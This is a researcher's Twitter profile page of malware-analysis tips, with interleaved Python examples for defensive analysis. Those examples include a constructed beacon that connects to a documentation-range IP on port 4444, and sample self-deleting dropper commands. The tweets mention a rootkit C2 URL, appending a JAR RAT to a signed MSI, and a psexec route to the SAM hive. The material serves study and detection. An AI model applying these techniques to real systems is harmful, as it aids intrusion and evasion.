Karsten Hahn

@struppigel

Followers
23,114
Following
722
Media
1,496
Statuses
8,912

MalwareAnalysisForHedgehogs, Principal Malware Researcher at GDATA, he/him 🦔🌈🏳️‍⚧️

Germany
Joined May 2014
Pinned Tweet
@struppigel
Karsten Hahn
1 year
My beginner's course for malware analysis is finally ready. 🎉🦔🦔🧫🧑‍🔬 Get access for free for the next 5 days by using the link below:
34
250
1K
@struppigel
Karsten Hahn
3 years
COVID-19 map for Germany looks pretty bad. Except for Ludwigslust-Parchim. It was hit by ransomware.
Tweet media one
Tweet media two
43
544
2K
@struppigel
Karsten Hahn
2 years
As a malware analyst I sometimes receive Microsoft files which have been manipulated. E.g. infected by a virus and cleaned afterwards. Here are some indicators to recognize PE file manipulation. 🧵
14
402
1K
@struppigel
Karsten Hahn
2 years
Tips to stay safe while working with malware samples. 1. Use a different OS on the host machine than your analysis VM --> most malware will not be able to run there
8
145
625
@struppigel
Karsten Hahn
1 year
RE Tip. If you want to decrypt obfuscated .NET strings, just call them from Powershell. E.g. this is xWorm config decryption. File:
Tweet media one
6
146
577
@struppigel
Karsten Hahn
3 years
This is JavaScript ➡️
Tweet media one
20
115
503
@struppigel
Karsten Hahn
5 years
Good tip of my colleague: This is how you can recognize 64 bit code wrongly interpreted as 32 bit code. It has lots of dec eax instructions because 0x48 is also used to signify 64 bit operand size. (32 bit interpretation is first picture, 64 bit second)
Tweet media one
Tweet media two
6
117
434
@struppigel
Karsten Hahn
1 year
Tfw you take a malware analysis course and give a bad rating because of malware files. o.O
Tweet media one
18
41
426
@struppigel
Karsten Hahn
5 years
I found this advertisement for a #Ransomware #Removal Tool on Reddit this morning. Seems fishy? Let's take a look.
Tweet media one
9
127
424
@struppigel
Karsten Hahn
7 years
I made an info graphic about process injection. (I am not good at design though). #processinjection
Tweet media one
15
210
418
@struppigel
Karsten Hahn
7 years
Process Injection Infographic, version 2. #processinjection Bigger image here:
Tweet media one
2
149
369
@struppigel
Karsten Hahn
3 years
☢️Network filter rootkit that connects to this IP in China: hxxp://110.42.4.180:2081/u It does not look like Moriya (signature will be corrected asap) File is signed by Microsoft. #rootkit #netfilter
12
130
347
@struppigel
Karsten Hahn
2 years
How to analyse malicious MSI files. E.g. this Magniber MSI. It consists mostly of zeroes. 1. step: Unpack with 7zip. Among the unpacked files is an x64 DLL named "djrbwtwujn". But how is this DLL called?
Tweet media one
9
102
331
@struppigel
Karsten Hahn
2 years
Ransomware simulators cannot test antivirus software. (thread)🧵
11
79
319
@struppigel
Karsten Hahn
2 years
Finally it is there: A GUI version of PortexAnalyzer🔎 PortexAnalyzer is a free PE parser tailored for malware analysis. It uses the library PortEx. 🔽Download: #PortEx #PortexAnalyzer
Tweet media one
3
96
302
@struppigel
Karsten Hahn
3 years
Dear PowerShell, it's always a pleasure to work with you. \s Sample:
Tweet media one
10
74
299
@struppigel
Karsten Hahn
3 years
Ever wanted to check what's inside HKLM\SAM and HKLM\SECURITY? You can run > psexec -s -i -d regedit.exe this will execute regedit as local system account
7
50
298
@struppigel
Karsten Hahn
4 years
This is interesting! ⬆️Jar files are read bottom to top, ⬇️MSI files are read top to bottom. Append a JAR RAT to a clean, signed MSI and you have a signed malware that will run as JAR with .jar extension. Sigcheck.exe tells you about invalid size.
9
137
296
@struppigel
Karsten Hahn
4 years
Found an archive containing more than 80 sources, tools and libraries for stealers written in C#. I will share with researchers/malware analysts only. DM me. #Stealer #source
Tweet media one
Tweet media two
Tweet media three
22
65
283
@struppigel
Karsten Hahn
2 years
Finding the right decompiler for Python bytecode can be a pain because there are so many. I compiled this table to check the supported versions
Tweet media one
7
80
276
@struppigel
Karsten Hahn
2 years
I created a NightHawk String Decoder IDAPython Script. It will add the decoded strings as comments to IDA.
Tweet media one
Tweet media two
2
94
274
@struppigel
Karsten Hahn
2 years
Microsoft signed rootkit #FuRootkit 🌳 Created and submitted in May, still only 4/10 \\Device\\Projector_Pro1_deviced 🧬 🕵️
Tweet media one
Tweet media two
7
91
256
@struppigel
Karsten Hahn
1 year
APIs related to memory allocation. Those can be useful to put breakpoints for unpacking. All of these end up at NtAllocateVirtualMemory, though.
Tweet media one
4
58
248
@struppigel
Karsten Hahn
2 years
I highly recommend this building your own OS series for learning reverse engineering.
1
53
241
@struppigel
Karsten Hahn
2 years
We are now happily married. 😊🥰
Tweet media one
54
0
218
@struppigel
Karsten Hahn
7 years
#FF Looking for good youtube channels to learn malware analysis? Check out channels by * @herrcore * @cybercdh * @moveax41h * @hasherezade
6
94
204
@struppigel
Karsten Hahn
3 years
Some tips on writing malware analysis reports. ➡️ have a list of sha256 hashes for analysed samples in one place that can be copied (no image) ➡️ if you include malware code, use an image instead of text, or AV will detect it ➡️ be concise, to the point, technically precise ...
2
48
205
@struppigel
Karsten Hahn
2 years
IDA Pro + Intezer plugin + mkYara + Lumina = fast signature creation
Tweet media one
Tweet media two
Tweet media three
3
61
205
@struppigel
Karsten Hahn
7 years
Some arbitrary facts about malware detection names and detection rates on VT. (thread)
3
101
203
@struppigel
Karsten Hahn
4 years
I once made a process injection infographic for a workshop
@struppigel
Karsten Hahn
7 years
Process Injection Infographic, version 2. #processinjection Bigger image here:
Tweet media one
2
149
369
3
65
182
@struppigel
Karsten Hahn
2 years
The world is full of beginner's guides for everything. We need more intermediate and expert knowledge for free.
12
19
191
@struppigel
Karsten Hahn
6 years
Some people seem to think it is a good idea to use sandboxes (like Sandboxie) for regular malware analysis. Here are a few resources and quotes by Wojtczuk and Kashyap that illustrate why it is not. (Thread) Also: Please use a VM instead!
Tweet media one
7
80
178
@struppigel
Karsten Hahn
5 years
Do you have recommendations for malware analysis and reversing blogs? Especially small ones. Don't be shy to announce your own blog. Please don't include Antivirus vendors.
49
72
182
@struppigel
Karsten Hahn
6 years
Lots of malware is written by idiots who assume you have standard paths and drives for your system. So you see hardcoded paths assuming your OS is installed on drive C: Install your OS on a different drive and you are safe from malware written by idiots.
5
41
182
@struppigel
Karsten Hahn
3 years
Do you want to become my colleague? My team is looking for malware analysts. Fully remote is possible. 📑PDF with more info:
Tweet media one
14
76
173
@struppigel
Karsten Hahn
4 years
People often ask for easy malware samples to study malware analysis. Here is a tip if you don't find any: ➡️ Just take any malware sample (e.g., from your email inbox) ➡️ Set a timer for 20 minutes ➡️ Find out as much as you can in that time frame, write it down.
2
50
172
@struppigel
Karsten Hahn
6 years
If a malware analyst was a medical doctor: "I am not sure yet what it is. Let's infect others with your virus first and see what happens."
7
46
168
@struppigel
Karsten Hahn
4 years
This week I went to an escape room at rätselraum ruhrpott and hid a ring in the last riddle. Now I am engaged to this wonderful man 🥰💍💙
Tweet media one
38
1
166
@struppigel
Karsten Hahn
9 months
New Video: APT Turla's Kopiluwak🦔📹 This is a suitable beginner sample for writing a C2 extractor with binary refinery or CyberChef 🔗 Chain: VBA ➡️ JS ➡️ JS #MalwareAnalysisForHedgehogs
5
62
167
@struppigel
Karsten Hahn
2 years
Detection technology research papers consistently misunderstand how much more impact a false positive has compared to false negatives. They often get equal weight. Sometimes false positives are even ignored.
11
49
171
@struppigel
Karsten Hahn
10 months
I have spent way too much time on writing this #GootLoader JS unpacker and C2 extractor with abstract syntax tree manipulation. 🌳 But I could not stop at having it half done and this malware has 6 layers. I am sorry for the terrible code.
Tweet media one
Tweet media two
8
50
163
@struppigel
Karsten Hahn
2 years
I got promoted to Lead Engineer for protection technologies @GDATA 🎉🍾
34
0
163
@struppigel
Karsten Hahn
4 years
Hunting malware is sometimes putting hours of work into samples just to find out that there is a comprehensive article about it from months ago.
7
11
155
@struppigel
Karsten Hahn
7 months
Today I stepped back from my lead engineer position to do again what I love the most: malware analysis. I am now Principal Malware Researcher at GDATA.
13
0
150
@struppigel
Karsten Hahn
3 years
Reddit user spreads malicious ISO via fake Avira website 🔗avira(dot)pw 🕵️‍♂️(6/54)
Tweet media one
2
46
139
@struppigel
Karsten Hahn
11 months
I am now a wheelchair user although I can walk. I am very happy about that. Here is why. (thread)
Tweet media one
40
16
144
@struppigel
Karsten Hahn
2 years
My team is looking for a Malware Analyst. You should be living somewhere in Germany or willing to relocate. Fully remote, office and hybrid are possible. Use application form: Or email: personal @gdata .de EN description:
Tweet media one
9
51
137
@struppigel
Karsten Hahn
1 year
I am looking for malware and reversing blogs that I can add to my feed. E.g. you just started publishing? Let me know. Please no companies and no big news sites.
33
27
141
@struppigel
Karsten Hahn
4 years
When did people start saying "detonate" as a synonym for executing malware? And why? It's not like malware explodes. Mostly it just runs boringly.
32
12
139
@struppigel
Karsten Hahn
2 years
I highly recommend this Malware Analysis series. Very information dense, maybe not for bloody beginners, but everyone else should take a look.
@ale_sp_brazil
Alexandre Borges
2 years
The sixth article in the Malware Analysis Series (MAS) is available: The C2 configuration extractor is slightly less trivial than expected. Thank you @ilfak and @HexRaysSA for supporting and providing me with IDA Pro. #malwareanalysis #malware
Tweet media one
20
305
792
3
38
138
@struppigel
Karsten Hahn
2 years
New article: "The real reason why malware detection is hard—and underestimated" If you think an AI with a 98% malware detection rate and 1% false positive rate is splendid, this might change your mind. #GDATATechblog @GDATA
4
56
133
@struppigel
Karsten Hahn
4 years
AutoIT extractor and decompiler by @x0r19x91 #AutoIt #decompiler ➡️
Tweet media one
5
62
136
@struppigel
Karsten Hahn
3 years
CPython 3.9 and upwards has no support by decompilers yet (afaik). But you can always analyse .pyc files by disassembling them. Python has its own module for that called dis. This is how you do it, e.g., for a malwaremodule.pyc 👇 #Python #reversing
Tweet media one
8
43
132
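The tweet's screenshot of the dis invocation is not part of this page, so here is an added, runnable version of the same workflow (my example, not the tweet author's code). It compiles a constructed stand-in module, writes it as a .pyc for the running interpreter, checks the magic number (the version mismatch that makes decompiler choice painful), disassembles every nested code object with dis, and collects the string constants and referenced names an analyst wants first. The module name, file name and C2 address are constructed.

```python
"""Disassemble a CPython .pyc with the standard-library dis module and pull out the
strings and names an analyst looks at first. Added example, not the tweet author's
code; the sample module, its file name and the C2 address are constructed."""
import dis
import importlib.util
import marshal
import os
import struct
import tempfile
import types

# Python 3.7+ .pyc header: magic(4) + flags(4) + mtime-or-hash(4) + size-or-hash(4)
PYC_HEADER_LEN = 16


def write_pyc(code, path):
    """Write a timestamp-style .pyc for the running interpreter (constructed sample)."""
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, 0)
    with open(path, "wb") as fh:
        fh.write(header + marshal.dumps(code))


def load_pyc(path):
    """Return the module's code object; refuse files built for another interpreter.
    marshal and dis only understand the bytecode of the version they ship with, which
    is why every decompiler carries a per-version support table."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        got = int.from_bytes(data[:2], "little")
        want = int.from_bytes(importlib.util.MAGIC_NUMBER[:2], "little")
        raise ValueError(f"pyc magic {got} does not match this interpreter ({want})")
    return marshal.loads(data[PYC_HEADER_LEN:])


def walk_code(code):
    """Yield the module code object and every nested function/class/lambda body."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)


def disassemble(code):
    """Full listing, one section per code object, as dis would print it."""
    return "\n".join(f"--- {c.co_name} ---\n{dis.Bytecode(c).dis()}" for c in walk_code(code))


def extract_indicators(code):
    """String constants and referenced names (imports, attributes, globals) of all bodies."""
    strings, names = set(), set()
    for c in walk_code(code):
        strings.update(k for k in c.co_consts if isinstance(k, str))
        names.update(c.co_names)
    return {"strings": sorted(strings), "names": sorted(names)}


# Constructed stand-in for a dropped module; the address is from the documentation range.
SAMPLE_SOURCE = '''
import socket
C2 = "198.51.100.7"
def beacon():
    s = socket.socket()
    s.connect((C2, 4444))
    s.send(b"hello")
'''


def demo():
    """Compile the sample, round-trip it through a .pyc on disk and analyse it."""
    code = compile(SAMPLE_SOURCE, "malwaremodule.py", "exec")
    fd, path = tempfile.mkstemp(suffix=".pyc")
    os.close(fd)
    try:
        write_pyc(code, path)
        loaded = load_pyc(path)
        listing = disassemble(loaded)
    finally:
        os.unlink(path)
    result = extract_indicators(loaded)
    result["has_import_name"] = "IMPORT_NAME" in listing
    result["listing"] = listing
    return result


if __name__ == "__main__":
    print(demo()["listing"])
```

For a real sample, call `load_pyc()` on the file and `disassemble()` on the result; if the magic check fails, run the script under the interpreter version the magic number belongs to rather than forcing a load.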
@struppigel
Karsten Hahn
5 years
#ZIPAnomaly ZIP archive that delivers #NanoCore uses two "End of Central Directory" markers. As a result compression tools behave differently when extracting. Some extract nothing, some only the first, some only the second file.
Tweet media one
6
49
129
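A small checker for the anomaly described in this tweet, added here as an example (not the tweet author's code). It scans a file for every EOCD signature, walks the central directory that physically precedes each one, and flags records whose stored directory offset does not match where the directory actually sits, which is what you get when a second archive is appended. The two archives are constructed in memory; the last function shows what Python's own zipfile makes of the result.

```python
"""Find ZIP files carrying more than one End-of-Central-Directory record and show
which members each record points at. Added example, not the tweet author's code;
the two archives are constructed in memory."""
import io
import re
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
CDH_SIG = b"PK\x01\x02"
EOCD_FMT = "<4sHHHHIIH"          # 22 bytes, fixed part of the EOCD record
CDH_FMT = "<4sHHHHHHIIIHHHHHII"  # 46 bytes, fixed part of a central directory header


def _read_central_dir(data, pos, entries):
    """Member names from `entries` consecutive central directory headers at `pos`."""
    names = []
    for _ in range(entries):
        if pos + 46 > len(data):
            break
        fields = struct.unpack_from(CDH_FMT, data, pos)
        if fields[0] != CDH_SIG:
            break
        name_len, extra_len, comment_len = fields[10], fields[11], fields[12]
        names.append(data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace"))
        pos += 46 + name_len + extra_len + comment_len
    return names


def find_eocd_records(data):
    """Every EOCD candidate plus the central directory written right before it.
    A well-formed archive has exactly one record and its cd_offset field equals the
    directory's real position; a mismatch means the record was written relative to a
    different file start, i.e. an archive was appended to another."""
    records = []
    for m in re.finditer(re.escape(EOCD_SIG), data):
        pos = m.start()
        if pos + 22 > len(data):
            continue
        (_sig, _disk, _cd_disk, _n_disk, n_total,
         cd_size, cd_offset, comment_len) = struct.unpack_from(EOCD_FMT, data, pos)
        cd_pos = pos - cd_size
        if cd_pos < 0:
            continue
        records.append({
            "eocd_pos": pos,
            "entries": n_total,
            "names": _read_central_dir(data, cd_pos, n_total),
            "offset_mismatch": cd_pos != cd_offset,
            "comment_len": comment_len,
        })
    return records


def python_zipfile_view(data):
    """What the Python zipfile module extracts: it honours the LAST EOCD and re-bases
    the offsets, so other tools that take the first record will disagree."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_sample():
    """Two constructed single-member archives, the second appended to the first."""
    def one(name, payload):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
            zf.writestr(name, payload)
        return buf.getvalue()
    return one("invoice.txt", b"constructed decoy member") + one("hidden.txt", b"constructed second member")


if __name__ == "__main__":
    sample = build_sample()
    for rec in find_eocd_records(sample):
        print(rec)
    print("zipfile sees:", python_zipfile_view(sample))
```

Triaging rule of thumb that follows from the output: more than one record, or any record with `offset_mismatch`, means the archive should be unpacked per record (or with several tools) before deciding it is clean.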
@struppigel
Karsten Hahn
7 years
New Blog Article: Interpreting Antivirus Detection Names. #MalwareAnalysisForHedgehogs 🦔 Thanks to @k_sec and @fwosar for additional information that I added to this article. @hexwaxwing You wanted this. 🙂
Tweet media one
6
52
127
@struppigel
Karsten Hahn
7 months
🦔📹 New Video: Unpacking Methods overview and when to use them. 📦 ➡️ Run and dump ➡️ Debugger and breakpoints ➡️ Self-extracting patch ➡️ Emulation ➡️ Static unpacking #MalwareAnalysisForHedgehogs #Unpacking
1
48
126
@struppigel
Karsten Hahn
3 years
#YaraTip for .NET You can not only add IL code and method names, but also method signatures to your Yara rules. Use the following command to print signature bytes for a method: ildasm.exe /TEXT /BYTES /ITEM="::Baz" <path-to-file>
Tweet media one
Tweet media two
2
47
123
@struppigel
Karsten Hahn
5 years
I cannot stress this enough (to beginners): Please use the most simple and effective tools first -- hex editor and strings tool (e.g. by SysInternals). You will find the low hanging fruits there. Btw IDA's strings view is **not** a replacement for a string tool.
11
14
122
@struppigel
Karsten Hahn
9 months
Yara practices I highly recommend after having written ~1500 rules🧵 #100DaysOfYara 1. For code patterns: add the disassembled code as comment Otherwise you force readers to reverse engineer the code pattern, making it hard to maintain, judge its usefulness and matches.
2
37
118
@struppigel
Karsten Hahn
6 years
New Video: Oligomorphic, Polymorphic and Metamorphic Viruses. 🤯 Or to put it differently: Concepts and terminology of encrypted viruses and self-mutating viruses. #MalwareAnalysisForHedgehogs 🦔
0
64
114
@struppigel
Karsten Hahn
1 year
I could use your help. I have a student who wants to learn C with the purpose of learning malware analysis. What resources do you recommend for C programming? They have a solid IT background but almost no programming.
27
22
116
@struppigel
Karsten Hahn
8 months
New Video: Unpacking payload from AutoIt-based stub 🦔 📹 2 ways: fast guessing or thorough analysis ➡️ extracting AutoIt script ➡️ finding relevant code in large scripts ➡️ string decryption ➡️ quick shellcode analysis #MalwareAnalysisForHedgehogs
1
42
109
@struppigel
Karsten Hahn
3 years
I got sent a black belt by @virustotal . Thank you 🥰
Tweet media one
6
6
106
@struppigel
Karsten Hahn
7 years
New Video: Process Injection via .Net DLL and Unpacking #MalwareAnalysisForHedgehogs
1
55
102
@struppigel
Karsten Hahn
11 months
New video: Purchase Order.pdf.zpaq unpacking and deobfuscation🦔📹 ZPAQ ➡️ .wav download ➡️ .NET DLL injector ➡️ .NET payload 🛠️zpaq, DnSpy, IlSpy, binary refinery, PortexAnalyzer, HxD, SystemInformer #MalwareAnalysisForHedgehogs #ZPAQ
2
44
105
@struppigel
Karsten Hahn
4 years
New Gozi variant hides in these registry keys followed by a counter as registry value ➡️HKCU\SOFTWARE\<username>\ ➡️HKCU\SOFTWARE\<username>1\ RunPE injection into: ➡️Windows Photo Viewer\ImagingDevices.exe
Tweet media one
Tweet media two
5
41
104
@struppigel
Karsten Hahn
1 year
Also useful functions for unpacking. You can find the infographic on my page, they are under Creative Commons license (CC BY):
Tweet media one
0
26
104
@struppigel
Karsten Hahn
1 year
New Video: Hiding .NET IL Code with R2R Stomping 🦔🎥 ➡️ creation of R2R stomped files ➡️ analysis of such files ➡️ same for singlefile executables ➡️ implications on AV detections #MalwareAnalysisForHedgehogs #R2RStomping
2
27
104
@struppigel
Karsten Hahn
2 years
Would you be interested in malware analysis book reviews for my upcoming videos?
17
2
97
@struppigel
Karsten Hahn
8 years
#Spora #ransomware is also a worm, it spreads like #Jenxcus . So I wrote this article:
Tweet media one
1
99
101
@struppigel
Karsten Hahn
5 years
#Malware101 #MalwareAnalysisForHedgehogs Why does malware often use batch commands or files that ping 8.8.8.8 a few times and then delete an executable? ➡️ ping is used as the equivalent of a sleep() call here. It passes time before the next command is executed
Tweet media one
8
21
101
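The idiom in this tweet is easy to hunt for in process-creation telemetry. The following detection is an added example (not the tweet author's code): it splits a command line into its `&`/`&&`/`|` segments, looks for a ping segment with an echo count, and reports any later segment that deletes an executable, together with the rough delay the ping buys. The command lines are constructed; treat the delay as approximate (one request per second).

```python
"""Detect the 'ping as sleep, then delete the executable' self-cleanup idiom in process
command lines (e.g. from process-creation logs). Added example, not the tweet author's
code; the command lines below are constructed."""
import re

SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
PING_RE = re.compile(r"\bping(?:\.exe)?\b", re.IGNORECASE)
COUNT_RE = re.compile(r"-n\s+(\d+)", re.IGNORECASE)
TARGET_RE = re.compile(r"(?<![\w.-])(\d{1,3}(?:\.\d{1,3}){3}|localhost|::1)(?![\w.-])")
DELETE_RE = re.compile(
    r"\b(?:del|erase)\b.*?(?P<path>\S+?\.(?:exe|dll|bat|cmd|vbs|js|ps1|scr))\b",
    re.IGNORECASE,
)
WINDOWS_DEFAULT_COUNT = 4  # ping.exe without -n sends four echo requests


def analyse_command(cmdline):
    """Return a finding dict when a ping segment is followed by a delete, else None."""
    segments = SPLIT_RE.split(cmdline)
    for i, seg in enumerate(segments):
        if not PING_RE.search(seg):
            continue
        count_m = COUNT_RE.search(seg)
        count = int(count_m.group(1)) if count_m else WINDOWS_DEFAULT_COUNT
        target_m = TARGET_RE.search(seg)
        for later in segments[i + 1:]:
            del_m = DELETE_RE.search(later)
            if del_m:
                return {
                    "command": cmdline,
                    # roughly one echo request per second, so the count is the delay in seconds
                    "approx_delay_seconds": count,
                    "ping_target": target_m.group(1) if target_m else None,
                    "deleted": del_m.group("path").strip('"'),
                }
    return None


def detect(cmdlines):
    """Run the check over many command lines and keep the hits."""
    return [f for f in (analyse_command(c) for c in cmdlines) if f]


# Constructed sample command lines: two self-deletion chains, three benign lines.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c ping 8.8.8.8 -n 10 > nul & del "C:\Users\Public\dropper.exe"',
    r"ping -n 5 127.0.0.1 >nul && erase /f /q %TEMP%\stage2.dll",
    r"ping -n 4 intranet.example.test",
    r"del /q C:\Temp\report.exe",
    r'powershell -c "Start-Sleep 10"',
]


if __name__ == "__main__":
    for finding in detect(SAMPLE_COMMAND_LINES):
        print(finding)
```

`timeout /t N` and PowerShell's `Start-Sleep` serve the same purpose in other droppers; a production rule would treat them as alternative "sleep" segments with the same follow-up check.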
@struppigel
Karsten Hahn
3 years
Today I finished working through this book. It is meant for .NET developers, but totally worth it for reverse engineering as well. Do you have any book tips for me?
Tweet media one
4
14
100
@struppigel
Karsten Hahn
2 years
Malware tip of the day. Sometimes samples are too big for analysis sandbox systems, VirusTotal etc. Check if the sample is bloated. You can do this easily with entropy visualization. Most common case: Zero bytes appended to the file.
Tweet media one
4
26
98
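The entropy picture in the tweet can be reproduced numerically. This added example (not the tweet author's code) computes per-block Shannon entropy, measures the run of identical bytes at the end of the file, and reports how much could be trimmed for submission. The sample bytes are constructed: a deterministic pseudo-random "payload" followed by 2 MiB of zeros.

```python
"""Per-block Shannon entropy and trailing-padding detection for oversized samples.
Added example, not the tweet author's code; the sample bytes are constructed."""
import hashlib
import math
from collections import Counter


def shannon_entropy(block):
    """Bits per byte, 0.0 for a run of one value, ~8.0 for random/compressed data."""
    if not block:
        return 0.0
    n = len(block)
    return -sum(c / n * math.log2(c / n) for c in Counter(block).values())


def block_entropies(data, block_size=4096):
    """The curve an entropy visualizer draws: one value per block."""
    return [shannon_entropy(data[i:i + block_size]) for i in range(0, len(data), block_size)]


def trailing_fill_run(data):
    """(length, byte value) of the run of identical bytes at the end of the file."""
    if not data:
        return 0, -1
    last = data[-1]
    stripped = data.rstrip(bytes([last]))
    return len(data) - len(stripped), last


def bloat_report(data, block_size=4096, min_padding=1 << 20):
    """Flag files whose tail is a long single-byte run (zero padding is the usual case).
    Trimming is only meant to get the sample under a submission size limit: record the
    hash of the original first, and remember that a PE overlay that is NOT padding can
    be legitimate data the payload reads at runtime."""
    ents = block_entropies(data, block_size)
    run, value = trailing_fill_run(data)
    low_tail = 0
    for e in reversed(ents):
        if e >= 1.0:
            break
        low_tail += 1
    bloated = run >= min_padding
    return {
        "size": len(data),
        "blocks": len(ents),
        "first_block_entropy": ents[0] if ents else 0.0,
        "low_entropy_tail_blocks": low_tail,
        "padding_bytes": run,
        "padding_value": value,
        "bloated": bloated,
        "trimmed_size": len(data) - run if bloated else len(data),
    }


def sample_data():
    """Constructed sample: 4 KiB of SHA-256 chain output (high entropy) + 2 MiB of zeros."""
    chunks, seed = [], b"constructed"
    for _ in range(128):
        seed = hashlib.sha256(seed).digest()
        chunks.append(seed)
    return b"".join(chunks) + b"\x00" * (2 << 20)


if __name__ == "__main__":
    print(bloat_report(sample_data()))
```

A tail of `0xFF`, a repeated text line, or a repeated junk DLL export table would show up the same way in the entropy curve but not in `trailing_fill_run`; for those, the low-entropy tail block count is the signal to act on.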
@struppigel
Karsten Hahn
3 years
I wrote a short article about malware hiding in Steam profile images, which was first mentioned by @miltinh0c #SteamMalware #SteamHide #GDATATechblog @GDATA
4
34
98
@struppigel
Karsten Hahn
6 years
Some thoughts about maliciousness of joke malware, educational malware and other "gray" areas. (thread)
3
44
94
@struppigel
Karsten Hahn
6 months
In case someone needs it: I made a shellcode to PE converter for win32 and win64. Usage: shellcode_to_pe.py win32 C:\shellcode_file
1
24
97
@struppigel
Karsten Hahn
7 years
New Video: Unpack and Decompile Python-to-Exe Malware 🦔 Also Happy New Year to everyone! 🥂 #MalwareAnalysisForHedgehogs
0
56
91